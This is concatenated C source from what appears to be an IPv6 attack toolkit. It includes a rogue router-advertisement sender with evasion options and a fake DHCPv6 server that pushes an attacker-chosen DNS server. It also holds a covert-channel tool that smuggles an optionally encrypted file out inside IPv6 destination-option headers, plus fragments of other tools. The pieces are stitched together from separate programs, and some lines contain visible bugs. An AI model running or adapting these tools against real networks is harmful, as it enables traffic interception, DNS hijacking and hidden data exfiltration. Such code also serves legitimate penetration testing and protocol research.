buf[6] = (id % 65536) / 256;
buf[7] = id % 256;
buf[8] = 192;
buf[10] = 0xff;
buf[11] = 0xff;
buf[12] = 1;
buf[14] = 3;
buf[15] = 16;
memcpy(&buf[16], coa, 16);
buf_len = 32;
if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
return -1;
thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len);
id += 16384;
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[16] = "", dmac[16] = "";
unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
unsigned char *pkt = NULL, *searchlist = NULL;
int pkt_len = 0;
pcap_t *p;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
memset(rbuf, 0, sizeof(rbuf));
memset(mac, 0, sizeof(mac));
while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
switch (i) {
case 'i':
interval = atoi(optarg);
break;
case 'm':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
(unsigned int *) &dmac[5]);
dstmac = dmac;
break;
case 'S':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
mac6 = mac;
break;
case 's':
if ((ip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
exit(-1);
}
break;
case 'M':
mtu = atoi(optarg);
if (mtu < 0 || mtu > 65535) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
break;
case 'n':
to_send = atoi(optarg);
if (to_send < 1 || mtu > 255) {
fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
exit(-1);
}
break;
case 'A':
if (pcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (size != 64)
fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
exit(-1);
}
pbuf[pcnt][0] = size % 256;
memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
pcnt++;
break;
case 'a':
plife = atoi(optarg);
break;
case 'r':
rlife = atoi(optarg);
break;
case 'd':
dlife = atoi(optarg);
break;
case 'l':
llife = atoi(optarg);
break;
case 'T':
reach = atoi(optarg);
break;
case 't':
trans = atoi(optarg);
break;
case 'p':
if (strncasecmp(optarg, "low", 3) == 0)
prio = 0;
else
if (strncasecmp(optarg, "med", 3) == 0)
prio = 1;
else
if (strncasecmp(optarg, "hi", 2) == 0)
prio = 2;
else
if (strncasecmp(optarg, "res", 3) == 0)
prio = 3;
else {
fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
exit(-1);
}
break;
case 'R':
if (rcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
exit(-1);
}
rbuf[rcnt][0] = size % 256;
memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
rcnt++;
break;
case 'D':
if (dcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
exit(-1);
}
if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
exit(-1);
}
break;
case 'L':
searchlist = optarg;
break;
case 'E':
if (optarg == NULL) {
fprintf(stderr, "Error: no option type given for -E\n");
exit(-1);
}
for (j = 0; j < strlen(optarg); j++) {
switch (optarg[j]) { // fall through to be fail safe on accidental misuse
case '0': // fall through
case 'O':
do_overlap = 1;
break;
case 'o':
do_overlap = 2;
break;
case '1': // fall through
case 'l': // fall through
case 'L':
do_frag++;
break;
case 'h': // fall through
case 'H':
do_hop = 1;
break;
case 'd': // fall through
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
exit(-1);
}
if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
exit(-1);
}
}
break;
case 'F':
ptr = strtok(optarg, ",");
while (ptr != NULL) {
if (strncasecmp(ptr, "man", 3) == 0)
flags = (flags | 128);
else if (strncasecmp(ptr, "oth", 3) == 0)
flags = (flags | 64);
else if (strncasecmp(ptr, "hom", 3) == 0)
flags = (flags | 32);
else if (strncasecmp(ptr, "prox", 4) == 0)
flags = (flags | 4);
else if (strncasecmp(ptr, "res", 3) == 0)
flags = (flags | 2);
else if (strncasecmp(ptr, "unk", 3) == 0)
flags = (flags | 1);
else {
fprintf(stderr, "Error: unknown flag: %s\n", ptr);
exit(-1);
}
ptr = strtok(NULL, ",");
}
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if ((argc - optind) < 1 || (argc - optind) > 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
interface = argv[optind];
if (argc - optind == 2)
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
exit(-1);
}
if (mtu == 0)
mtu = thc_get_mtu(interface);
if (mac6 == NULL)
if ((mac6 = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (ip6 == NULL)
if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
exit(-1);
}
// if (dns == NULL)
// dns = thc_resolve6("ff02::fb");
frint = interface;
frip6 = ip6;
frmac = mac6;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if (llife > 0xffff)
llife = 0xffff;
llife = (llife | 0xff000000);
if (prio == 2)
llife = (llife | 0x00080000);
else if (prio == 0)
llife = (llife | 0x00180000);
else if (prio != 1)
llife = (llife | 0x00100000);
llife = (llife | (flags << 16));
buf[0] = reach / 16777216;
buf[1] = (reach % 16777216) / 65536;
buf[2] = (reach % 65536) / 256;
buf[3] = reach % 256;
buf[4] = trans / 16777216;
buf[5] = (trans % 16777216) / 65536;
buf[6] = (trans % 65536) / 256;
buf[7] = trans % 256;
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
i = 16;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// option prefix, put all in
if (pcnt > 0)
for (j = 0; j < pcnt; j++) {
buf[i++] = 3;
buf[i++] = 4;
buf[i++] = pbuf[j][0]; // prefix length
buf[i++] = 128 + 64;
buf[i++] = plife / 16777216;
buf[i++] = (plife % 16777216) / 65536;
buf[i++] = (plife % 65536) / 256;
buf[i++] = plife % 256;
buf[i++] = (plife / 2) / 16777216;
buf[i++] = ((plife / 2) % 16777216) / 65536;
buf[i++] = ((plife / 2) % 65536) / 256;
buf[i++] = (plife / 2) % 256;
i += 4; // + 4 bytes reserved
memcpy(&buf[i], (char *) &pbuf[j][1], 16);
i += 16;
}
// route option, put all in
if (rcnt > 0)
for (j = 0; j < rcnt; j++) {
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = rbuf[j][0]; // prefix length
if (prio == 2)
buf[i++] = 0x08; // priority, highest of course
else if (prio == 1)
buf[i++] = 0x00;
else if (prio == 0)
buf[i++] = 0x18;
else
buf[i++] == 0x10;
buf[i++] = rlife / 16777216;
buf[i++] = (rlife % 16777216) / 65536;
buf[i++] = (rlife % 65536) / 256;
buf[i++] = rlife % 256;
memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network
i += 16;
}
// dns option
if (dcnt > 0)
for (j = 0; j < dcnt; j++) {
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // reserved
buf[i++] = dlife / 16777216;
buf[i++] = (dlife % 16777216) / 65536;
buf[i++] = (dlife % 65536) / 256;
buf[i++] = dlife % 256;
memcpy(buf + i, dbuf[j], 16); // dns server
i += 16;
}
// dns searchlist option
if (searchlist != NULL) {
buf[i] = 31;
buf[i + 4] = dlife / 16777216;
buf[i + 5] = (dlife % 16777216) / 65536;
buf[i + 6] = (dlife % 65536) / 256;
buf[i + 7] = dlife % 256;
if (searchlist[strlen(searchlist) - 1] == '.')
searchlist[strlen(searchlist) - 1] = 0;
m = 0;
while ((ptr = strstr(searchlist, ".,")) != NULL) {
m = strlen(ptr);
for (l = 1; l < m; l++)
ptr[l - 1] = ptr[l];
ptr[m - 1] = 0;
}
l = 0;
m = 0;
j = strlen(searchlist);
do {
k = 0;
ptr = index(&searchlist[l], '.');
if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
k = 1;
ptr = index(&searchlist[l], ',');
}
if (ptr != NULL)
*ptr = 0;
n = strlen(&searchlist[l]);
buf[i + 8 + m] = n;
memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);
if (ptr == NULL)
l = j;
else
l += 1 + n;
m += 1 + n;
if (k || ptr == NULL)
m++; // end of domain entry
} while (l < j && ptr != NULL);
if (m % 8 > 0)
m = ( (m / 8) + 1 ) * 8;
buf[i + 1] = m/8 + 1;
i += m + 8;
}
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (j = 0; i < do_frag; j++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);
// init pcap
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Starting to advertise router (Press Control-C to end) ...\n");
while (sent < to_send || to_send > 255) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
} else if (do_overlap) {
if (do_overlap == 1)
thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
else
thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sent++;
if (sent != to_send || to_send > 255)
sleep(interval);
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000];
unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac;
int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0;
char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };;
int rawmode = 0, tcp_port = -1;
FILE *f;
BF_KEY bfkey;
if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) {
switch (i) {
case 'r':
rawmode = 1;
thc_ipv6_rawmode(1);
break;
case 'k':
key = optarg;
break;
case 'm':
mtu = atoi(optarg);
break;
case 's':
send = atoi(optarg);
break;
default:
exit(-1);
}
}
if (argc < optind + 2) {
fprintf(stderr, "Error: Not enough parameters!\n");
help(argv[0]);
}
interface = argv[optind];
dst6 = thc_resolve6(argv[optind + 1]);
if ((f = fopen(argv[optind + 2], "r")) == NULL) {
fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]);
exit(-1);
}
if (argc >= optind + 4 && argv[optind + 3] != NULL)
tcp_port = atoi(argv[optind + 3]);
if (mtu == 0)
mtu = thc_get_mtu(interface);
if (mtu <= 1000) {
fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface);
exit(-1);
}
mac = thc_get_own_mac(interface);
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "Error: can not get MAC for target\n");
exit(-1);
}
srand(getpid());
mtu -= 128;
if (mtu % 255 == 0)
i = 2 * (mtu / 255);
else
i = 2 + 2 * (mtu / 255);
mtu = mtu - i;
if ((mtu + i + 14) % 8 > 0)
mtu = (((mtu + i + 14) / 8) * 8) - (i + 14);
if (mtu > 14 * 255)
mtu = 14 * 255;
if (key != NULL) {
memset(&bfkey, 0, sizeof(bfkey));
SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
memset(vec, 0, sizeof(vec));
num = 0;
}
id = rand();
buf[0] = 16;
buf[1] = 4;
memcpy(buf + 2, (char *) &id, 4);
buf[6] = 17;
buf[7] = 4;
while ((bytes = fread(rbuf, 1, mtu, f)) > 0) {
seq++;
if (key != NULL) {
BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT);
memcpy(rbuf, wbuf, bytes);
}
memcpy(buf + 8, (char *) &seq, 4);
bufsize = 12;
rounds = bytes / 255;
for (i = 0; i <= rounds; i++) {
buf[bufsize] = i + 18;
if (i == rounds)
wbytes = bytes % 255;
else
wbytes = 255;
buf[bufsize + 1] = wbytes;
memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes);
bufsize += wbytes + 2;
}
if (bytes < mtu) {
buf[bufsize] = 0x1f;
buf[bufsize + 1] = 0;
bufsize = bufsize + 2;
}
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize))
return -1;
if (tcp_port == -1) {
if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0)
return -1;
} else {
if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
return -1;
}
if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
printf("Sending packet seq# %d\n", seq);
for (i = 0; i < send; i++) {
thc_send_pkt(interface, pkt1, &pkt1_len);
usleep(100);
}
}
printf("All sent.\n");
return 0;
}
int main(int argc, char *argv[]) {
char *routerip, *interface, mac[16] = "";
char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024];
unsigned char *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3;
unsigned char *dns;
int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen, csize = 0;
static struct iovec iov;
struct sockaddr_storage from;
struct msghdr mhdr;
struct sockaddr_in6 ddst;
unsigned long long int count = 0;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
if (strcmp(argv[1], "-r") == 0) { // is ignored
argv++;
argc--;
}
memset(mac, 0, sizeof(mac));
interface = argv[1];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc >= 6 && (ptr = argv[5]) != NULL)
sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
if (argc >= 5 && argv[4] != NULL)
ip6 = thc_resolve6(argv[4]);
else
ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
if (argc >= 4 && argv[3] != NULL)
dns = thc_resolve6(argv[3]);
else
dns = thc_resolve6("ff02::fb");
routerip = argv[2];
if ((ptr = index(routerip, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr);
routerip6 = thc_resolve6(routerip);
if (routerip6 == NULL || size < 1 || size > 128) {
fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[2]);
exit(-1);
}
if (size < 64) {
fprintf(stderr, "Warning: network prefix must be a minimum of /64, resizing to /64\n");
size = 64;
}
if (size % 8 > 0) {
size = ((size / 8) + 1) * 8;
fprintf(stderr, "Warning: prefix must be a multiple of 8, resizing to /%d\n", csize * 8);
}
csize = 8 - ((size - 64) / 8);
if (dns == NULL) {
fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]);
exit(-1);
}
if (ip6 == NULL) {
fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]);
exit(-1);
}
/*
if (mtu < 1 || mtu > 65536) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
*/
if (mac6 == NULL) {
fprintf(stderr, "Error: mac address in invalid\n");
exit(-1);
}
if ((s = thc_bind_udp_port(547)) < 0) {
fprintf(stderr, "Error: could not bind to 547/udp\n");
exit(-1);
}
if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) < 0 || thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) < 0) {
fprintf(stderr, "Error: could not bind multicast address\n");
exit(-1);
}
if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) {
perror("Error:");
exit(-1);
}
memset(mybuf, 0, sizeof(mybuf));
mybuf[1] = 2;
mybuf[3] = 14;
mybuf[5] = 1;
mybuf[7] = 1;
// mybuf + 8 == time
memcpy(mybuf + 12, mac6, 6);
mlen = 18;
mybuf[mlen + 1] = 23;
mybuf[mlen + 3] = 16;
memcpy(mybuf + mlen + 4, dns, 16);
mlen += 20;
printf("Starting to fake dhcp6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]);
while (1) {
memset((char *) &from, 0, sizeof(from));
memset(&iov, 0, sizeof(iov));
memset(&mhdr, 0, sizeof(mhdr));
iov.iov_base = rdatabuf;
iov.iov_len = sizeof(rdatabuf);
mhdr.msg_name = &from;
mhdr.msg_namelen = sizeof(from);
mhdr.msg_iov = &iov;
mhdr.msg_iovlen = 1;
mhdr.msg_control = (caddr_t) cmsgbuf;
mhdr.msg_controllen = sizeof(cmsgbuf);
if ((len = recvmsg(s, &mhdr, 0)) > 0) {
fromlen = mhdr.msg_namelen;
if (debug)
thc_dump_data(rdatabuf, len, "Received Packet");
ddst.sin6_addr = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_addr;
ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
switch (rdatabuf[0]) {
case 1:
ptr1 = "Solicitate";
break;
case 2:
ptr1 = "Advertise (illegal, ignored)";
break;
case 3:
ptr1 = "Request";
break;
case 4:
ptr1 = "Confirm";
break;
case 5:
ptr1 = "Renew";
break;
case 6:
ptr1 = "Rebind";
break;
case 7:
ptr1 = "Reply (illegal, ignored)";
break;
case 8:
ptr1 = "Release (ignored)";
break;
case 9:
ptr1 = "Decline (ignored)";
break;
case 10:
ptr1 = "Reconfigure (illegal, ignored)";
break;
case 11:
ptr1 = "Information Request (ignored)";
break;
case 12:
ptr1 = "Relay Forward (ignored)";
break;
case 13:
ptr1 = "Relay Reply (ignored)";
break;
default:
ptr1 = "Unknown (ignored)";
break;
}
printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2);
free(ptr2);
if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) {
memset(wdatabuf, 0, sizeof(wdatabuf));
memcpy(wdatabuf + 1, rdatabuf + 1, 3);
i = j = 4;
k = -1;
if (rdatabuf[0] == 1) { // initial request
wdatabuf[0] = 2;
while ((j + 4) < len) {
l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
if (l + j + 4 > len) {
l = 0;
j = len;
printf("Info: received evil packet\n");
} else {
if (rdatabuf[j + 1] == 1) {
memcpy(wdatabuf + i, rdatabuf + j, l + 4);
i += l + 4;
} else if (rdatabuf[j + 1] == 3) {
k = j; // just set a pointer
}
j += l + 4;
}
}
// add 02, 23
j = time(NULL);
memcpy(mybuf + 8, (char *) &j + _TAKE4, 4);
memcpy(wdatabuf + i, mybuf, mlen);
i += mlen;
// now expand 3
if (k > -1 && rdatabuf[k + 3] == 12 && rdatabuf[k + 2] == 0) { // copy structure
memcpy(wdatabuf + i, rdatabuf + k, 16);
} else { // or create new
wdatabuf[i + 1] = 3;
memcpy(wdatabuf + i + 4, (char *) &j + _TAKE4, 4); // copy time as IAID
}
wdatabuf[i + 3] = 40;
memset(wdatabuf + i + 8, 0, 8);
wdatabuf[i + 10] = 0x7f;
wdatabuf[i + 14] = 0xfe;
i += 16;
wdatabuf[i + 1] = 5;
wdatabuf[i + 3] = 24;
memcpy(wdatabuf + i + 4, routerip6, 16); // address
count++;
if (csize > 0)
memcpy(wdatabuf + i + 4 + 16 - csize, (char *) &count, csize); // counter
ptr3 = thc_ipv62notation(wdatabuf + i + 4);
wdatabuf[i + 21] = 2;
wdatabuf[i + 25] = 2;
i += 28;
} else {
wdatabuf[0] = 7;
m = 0;
while ((j + 4) < len) {
l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3];
if (l + j + 4 > len) {
l = 0;
j = len;
printf("Info: received evil packet\n");
} else { // just copy types 1-3 and 23
if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) || rdatabuf[j + 1] == 23) {
memcpy(wdatabuf + i, rdatabuf + j, l + 4);
i += l + 4;
if (rdatabuf[j + 1] == 23)
k = 1;
if (rdatabuf[j + 1] == 3)
m = 1;
}
j += l + 4;
}
}
if (k == -1) {
memcpy(wdatabuf + i, mybuf + 18, 20);
i += 20;
}
}
len = i;
if (debug)
thc_dump_data(wdatabuf, len, "Reply Packet");
ddst.sin6_family = AF_INET6;
ddst.sin6_port = htons(546);
//ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr;
ddst.sin6_scope_id = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_scope_id;
if (sendto(t, wdatabuf, len, 0, (struct sockaddr *) &ddst, sizeof(ddst)) < 0)
perror("Error:");
else {
ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr);
if (wdatabuf[0] == 2) {
printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2, ptr3);
free(ptr3);
} else if (m)
printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2);
else
printf("Sent DHCP6 Reply packet to %s (did not set address)\n", ptr2);
free(ptr2);
}
}
}
}
/* packet structure:
1 byte = type
3 bytes = sessionid
while(packet data) {
2 bytes = type
2 bytes = length in bytes of following data
... defined fixed length data ...
}
server listen on ff02::1:2 udp 547
client connects from linklocal port 546, ttl 1
01 = solicit
3 bytes = sessionid
6 bytes = blog (elapsed, 8)
8 bytes = 01 blob (client id + time + mac)
4 bytes = time
6 bytes = mac
16 bytes = 03 blob (want perm address)
5 + length + hostname = hostname
18 bytes = blob (vendor class, type 16)
12 bytes = blob (requested options, type 6)
server sends to linklocal (respect client port), ttl 1
02 = advertise
3 bytes = sessionid (copy)
18 bytes = 01 blob (client copy of client-id)
8 bytes = 02 blob (server id + time + mac)
4 bytes = time
6 bytes = mac
0003 = give perm address
2 bytes = length
4 bytes = IAID (from client request!)
4 bytes = validity time 1 (1800)
4 bytes = validity time 2 (2880)
0005 = address structure
2 bytes = length (24 bytes)
16 bytes = address
4 bytes = validity time (3600)
4 byte = validity time (same)
0023 = dns option
2 bytes = length (16 bytes)
16 bytes = dns server address
client sends to ff02::1:2 !
03 = request
3 bytes = sessionid
6 bytes = blog (elapsed, 8)
8 bytes = 01 blob (client id + time + mac)
4 bytes = time
6 bytes = mac
18 bytes = client (again)
18 bytes = server (copy)
44 bytes = address (copy)
5 + length + hostname = hostname (again)
18 bytes = blob again (vendor class, type 16)
12 bytes = blob again (requested options, type 6)
server replies
7 = reply
copy original advertise packet :-)
*/
return 0; // never reached
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[65536], bla[1500], tests[256];
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i, j, k, srcmtu, fragsize;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
if ((dst6 = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
exit(-1);
}
//route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface: %s\n", interface);
exit(-1);
}
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
fragsize = ((srcmtu - 62) / 8) * 8;
setvbuf(stdout, NULL, _IONBF, 0);
memset(buf, 0, sizeof(buf));
memset(tests, 0, sizeof(tests));
memset(bla, 0, sizeof(bla));
if (test < 1 || test > MAX_TEST) {
printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
